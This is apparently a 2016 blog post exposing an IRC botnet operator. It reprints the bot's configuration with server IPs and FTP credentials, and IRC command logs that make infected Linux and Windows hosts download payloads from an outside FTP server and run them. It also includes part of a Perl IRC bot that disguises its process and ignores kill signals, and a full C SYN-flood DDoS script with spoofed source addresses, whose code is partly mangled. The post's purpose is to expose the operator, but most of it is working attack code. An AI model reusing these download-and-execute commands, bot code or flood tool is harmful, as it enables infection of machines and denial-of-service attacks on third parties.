ITS Ownz: 2016

Spreading ftp server : 
ft*://kobra:kobra@195.234.176.57/
bot config ////////pbot.php////////
class pBot
{
    var $config = array("server" => "112.124.47.140", "port" => "2222", "pass" => "", 
"prefix" => "NOU", "maxrand" => "6", "chan" => "#pma", "chan2" => "#pma2", 
"key" => "NEW", "modes" => "+pwisx", "password" => "123", "trigger" => ".", 
"hostauth" => "ANONYMOUS.XYZ", "limit" => "300" 
        );
/////////end//////////

Also first no dns at this poit to prevent suspending but soon as the new infected machine joins IRC auto msg from user "w" whith an
mrc script commands the bot to download new bot file :

Here the msg from "w"

[20:59] <w> .user ro
[20:59] <w> .uname
[20:59] <w> .exec killall -9 perl
[20:59] <w> .exec cd /tmp/;wget ***://user:ggallery@66.71.191.82/a.pdf ; 
curl -O f*p://user:ggallery@66.71.191.82/a.pdf ; 
fetch f*p://user:ggallery@66.71.191.82/a.pdf ; 
lwp-download ftp://user:ggallery@66.71.191.82/a.pdf ; perl a.pdf ; rm -rf a.*
[20:59] <w> .exec cd /dev/shm/;wget ***://user:ggallery@66.71.191.82/drn.tgz;tar xvf drn.tgz;rm -rf drn.tgz;cd .p;
./autorun;./run;
[20:59] <w> .download *****/lewl.ucoz.site/sexy.exe D:\sexy.exe
[20:59] <w> .exec start sexy.exe
[20:59] <w> .download ****//lewl.ucoz.site/sexy.exe C:\sexy.exe
[20:59] <w> .exec start D:\sexy.exe
[20:59] <w> .exec start C:\sexy.exe
[20:59] <w> .exec del sexy.exe C:\sexy.exe
[20:59] <w> .exec rm -rf sexy.exe C:\sexy.exe perl*
[20:59] <w> .exec cd /dev/shm ;wget f***://user:ggallery@66.71.191.82/drn.tgz;tar xvf drn.tgz;rm -rf drn.tgz;cd .p;./run;
[20:59] <w> .start D:\sexy.exe
[20:59] <w> .start C:\sexy.exe
[20:59] <w> .die

Also lets check ftp : 3 files

a.pdf // new bot whith the dns
drn.tgz // Linux backdoor and irc bot
gscan.tgz // His personal ZeMu setup

And in a.pdf we see hes real dns and one photo down too

// Dont download if u dont know what u doing .... drn.tgz : Sample
And Sexy.exe is a irc bot to mIRC base , packed as a SFX arschive
some files :

And some other things found on his ftp , a yeah he fortgot to give limited access to that ftp user or just dumb to user anonymous user ... anyways all his shit rm -f * . If someone interested in this shit just email me :


# TeaMrx Perlbot vS xeQT


my @mast3rs = ("Low","Loww");


my @admchan=("#Perli");

$servidor='188.119.151.131' unless $servidor;  // his server 


my $xeqt = "!x";
my $homedir = "/tmp";
my $shellaccess = 1;
my $xstats = 1;
my $pacotes = 1;
my $linas_max = 5;
my $sleep = 6;
my $portime = 4;

my @fakeps = ("/usr/local/apache/bin/httpd -DSSL",
    "/usr/sbin/httpd -k start -DSSL",
    "/usr/sbin/httpd",
    "spamd child",
    "httpd");

my @nickname = ("TeaMrx","......","xQt");

my @xident = ("noway",......yn","ju");

my @xname = ("Googurl (C) 2006 xeQt","........","Team Work","jet lie");

#################
# Random Ports
#################
my @rports = ("6667");

my @Mrx = ("\001mIRC32 v5.91 K.Mardam-Bey\001","\001mIRC v6.2 Khaled Mardam-Bey\001",
    "\001mIRC v6.03 Khaled Mardam-Bey\001","\001mIRC v6.14 Khaled Mardam-Bey\001",
    "\001mIRC v6.15 Khaled Mardam-Bey\001","\001mIRC v6.16 Khaled Mardam-Bey\001",
    "\001mIRC v6.17 Khaled Mardam-Bey\001","\001mIRC v6.21 Khaled Mardam-Bey\001",
    "\001Snak for Macintosh 4.9.8 English\001",
    "\001DvC v0.1 PHP-5.1.1 based on Net_SmartIRC\001",
    "\001PIRCH98:WIN 95/98/WIN NT:1.0 (build 1.0.1.1190)\001",
    "\001xchat 2.6.2 Linux 2.6.18.5 [i686/2.67GHz]\001",
    "\001xchat:2.4.3:Linux 2.6.17-1.2142_FC4 [i686/2,00GHz]\001",
    "\001xchat:2.4.3:Linux 2.6.17-1.2142_FC4 [i686/1.70GHz]\001",
    "\001XChat-GNOME IRC Chat 0.16 Linux 2.6.20-8-generic [i686]\001",
    "\001ircN 7.27 + 7.0 - -\001","\001..(argon/1g) :bitchx-1.0c17\001",
    "\001ircN 8.00  -  he tries to tell me what I put inside of me  - \001",
    "\001FreeBSD!4.11-STABLE bitchx-1.0c18 - prevail[0123] :down with people\001",
    "\001BitchX-1.0c19+ by panasync - Linux 2.4.31 : Keep it to yourself!\001",
    "\001BitchX-1.0c19+ by panasync - Linux 2.4.33.3 : Keep it to yourself!\001",
    "\001BitchX-1.1-final+ by panasync - Linux 2.6.18.1 : Keep it to yourself!\001",
    "\001BitchX-1.0c19 by panasync - freebsd 4.10-STABLE : Keep it to yourself!\001",
    "\001BitchX-1.1-final+ by panasync - FreeBSD 4.5-STABLE : Keep it to yourself!\001",
    "\001BitchX-1.1-final+ by panasync - FreeBSD 6.0-RELEASE : Keep it to yourself!\001",
    "\001BitchX-1.1-final+ by panasync - FreeBSD 5.3-RELEASE : Keep it to yourself!\001",
    "\001bitchx-1.0c18 :tunnelvision/1.2\001","\001PnP 4.22 - http://www.pairc.com/\001",
    "\001BitchX-1.0c17/FreeBSD 4.10-RELEASE:(c)rackrock/bX [3.0.1ÃƒÆ’Ã‚Â¡9] : Keep it to yourself!\001",
    "\001P&P 4.22.2 (in development) + X Z P Bots, Sound, NickServ, ChanServ, Extras\001",
    "\001HydraIRC v0.3.148 (18/Jan/2005) by Dominic Clifton aka Hydra - #HydraIRC on EFNet\001",
    "\001irssi v0.8.10 - running on Linux i586\001","\001irssi v0.8.10 - running on FreeBSD i386\001",
    "\001ircII 20050423+ScrollZ 1.9.5 (19.12.2004)+Cdcc v1.6mods v1.0 by acidflash - Almost there\001",
    "\001ircII 20050423+ScrollZ 1.9.5 (19.12.2004)+Cdcc v1.8+OperMods v1.0 by acidflash - Almost there\001");

# Default quick scan ports
my @portas=("21","22","23","25","53","80","110","113","143","3306","4000","5900","6667","6668","6669","7000","10000","12345","31337","65501");

# xeQt

#my $nick = "sshb0t1";
my $nick = $nickname[rand scalar @nickname];
my $realname = $xname[rand scalar @xname];
my $ircname = $xident[rand scalar @xident];
my $porta = $rports[rand scalar @rports];
my $xproc = $fakeps[rand scalar @fakeps];
my $Mrx = $Mrx[rand scalar @Mrx];
my $version = 'vSm0d (C) TeaMrx';

$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';

use IO::Socket;
use Socket;
use IO::Select;
chdir("$homedir");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$xproc"."\0";
my $pid=fork;
exit if $pid;
die "[x] -> Cannot fork into background: $!" unless defined($pid);
my %irc_servers;
my %DCC;
my $dcc_sel = new IO::Select->new();

sub getnick {
  return "$nickname[rand scalar @nickname]".int(rand(1000));
}

neeedd to delete some shit coz site gets blacklisted

  }

ahh found this in his spreaading ftp maybe interesting to someone ....


/* "DOMINATE" Attack Script, this script was so difficult to make, it required taking the very public ESSYN
attack script, and replacing "tcph->res2 = 1;" to "tcph->res2 = 3;" in the "setup_tcp_header" function.
Anybody who purchased this script for $300 BTC, yup, it's literally changing a 1 to a 3.
*/
#include unistd.h
#include time.h
#include sys/types.h
#include sys/socket.h
#include sys/ioctl.h
#include string.h
#include stdlib.h
#include stdio.h
#include pthread.h
#include netinet/tcp.h
#include netinet/ip.h
#include netinet/in.h
#include netinet/if_ether.h
#include netdb.h
#include net/if.h
#include arpa/inet.h

#define MAX_PACKET_SIZE 4096
#define PHI 0x9e3779b9

static unsigned long int Q[4096], c = 362436;
static unsigned int floodport;
volatile int limiter;
volatile unsigned int pps;
volatile unsigned int sleeptime = 100;

void init_rand(unsigned long int x)
{
 int i;
 Q[0] = x;
 Q[1] = x + PHI;
 Q[2] = x + PHI + PHI;
 for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
}
unsigned long int rand_cmwc(void)
{
 unsigned long long int t, a = 18782LL;
 static unsigned long int i = 4095;
 unsigned long int x, r = 0xfffffffe;
 i = (i + 1) & 4095;
 t = a * Q[i] + c;
 c = (t >> 32);
 x = t + c;
 if (x < c) {
  x++;
  c++;
 }
 return (Q[i] = r - x);
}
unsigned short csum (unsigned short *buf, int count)
{
 register unsigned long sum = 0;
 while( count > 1 ) { sum += *buf++; count -= 2; }
 if(count > 0) { sum += *(unsigned char *)buf; }
 while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
 return (unsigned short)(~sum);
}

unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {

 struct tcp_pseudo
 {
  unsigned long src_addr;
  unsigned long dst_addr;
  unsigned char zero;
  unsigned char proto;
  unsigned short length;
 } pseudohead;
 unsigned short total_len = iph->tot_len;
 pseudohead.src_addr=iph->saddr;
 pseudohead.dst_addr=iph->daddr;
 pseudohead.zero=0;
 pseudohead.proto=IPPROTO_TCP;
 pseudohead.length=htons(sizeof(struct tcphdr));
 int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
 unsigned short *tcp = malloc(totaltcp_len);
 memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
 memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
 unsigned short output = csum(tcp,totaltcp_len);
 free(tcp);
 return output;
}

void setup_ip_header(struct iphdr *iph)
{
 iph->ihl = 5;
 iph->version = 4;
 iph->tos = 0;
 iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
 iph->id = htonl(54321);
 iph->frag_off = 0;
 iph->ttl = MAXTTL;
 iph->protocol = 6;
 iph->check = 0;
 iph->saddr = inet_addr("192.168.3.100");
}

void setup_tcp_header(struct tcphdr *tcph)
{
 tcph->source = htons(5678);
 tcph->seq = rand();
 tcph->ack_seq = 0;
 tcph->res2 = 3;
 tcph->doff = 5;
 tcph->syn = 1;
 tcph->window = htonl(65535);
 tcph->check = 0;
 tcph->urg_ptr = 0;
}

void *flood(void *par1)
{
 char *td = (char *)par1;
 char datagram[MAX_PACKET_SIZE];
 struct iphdr *iph = (struct iphdr *)datagram;
 struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
 
 struct sockaddr_in sin;
 sin.sin_family = AF_INET;
 sin.sin_port = htons(floodport);
 sin.sin_addr.s_addr = inet_addr(td);

 int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
 if(s < 0){
  fprintf(stderr, "Could not open raw socket.\n");
  exit(-1);
 }
 memset(datagram, 0, MAX_PACKET_SIZE);
 setup_ip_header(iph);
 setup_tcp_header(tcph);

 tcph->dest = htons(floodport);

 iph->daddr = sin.sin_addr.s_addr;
 iph->check = csum ((unsigned short *) datagram, iph->tot_len);

 int tmp = 1;
 const int *val = &tmp;
 if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
  fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
  exit(-1);
 }

 init_rand(time(NULL));
 register unsigned int i;
 i = 0;
 while(1){
  sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));

  iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
  iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
  iph->check = csum ((unsigned short *) datagram, iph->tot_len);
  tcph->seq = rand_cmwc() & 0xFFFF;
  tcph->source = htons(rand_cmwc() & 0xFFFF);
  tcph->check = 0;
  tcph->check = tcpcsum(iph, tcph);
  
  pps++;
  if(i >= limiter)
  {
   i = 0;
   usleep(sleeptime);
  }
  i++;
 }
}
int main(int argc, char *argv[ ])
{
 if(argc < 6){
  fprintf(stderr, "Invalid parameters!\n");
  fprintf(stdout, "Usage: %s     \n", argv[0]);
  exit(-1);
 }

 fprintf(stdout, "Setting up Sockets...\n");

 int num_threads = atoi(argv[3]);
 floodport = atoi(argv[2]);
 int maxpps = atoi(argv[4]);
 limiter = 0;
 pps = 0;
 pthread_t thread[num_threads];
 
 int multiplier = 20;

 int i;
 for(i = 0;i maxpps)
  {
   if(1 > limiter)
   {
    sleeptime+=100;
   } else {
    limiter--;
   }
  } else {
   limiter++;
   if(sleeptime > 25)
   {
    sleeptime-=25;
   } else {
    sleeptime = 0;
   }
  }
  pps = 0;
 }

 return 0;
}

ITS Ownz

Pages

Saturday, December 10, 2016

IRC - drona.bot.nu - Botnet

Monday, November 28, 2016

ragebot - scan1.zapto.org - t0nixx [SKID]

Saturday, November 19, 2016

5k - Perl/ShellBot.B ddos - IRC

Sunday, November 13, 2016

pBot Skidd - 93.158.200.94 - IRC

Saturday, November 12, 2016

Bot - l.lolole.net - IRC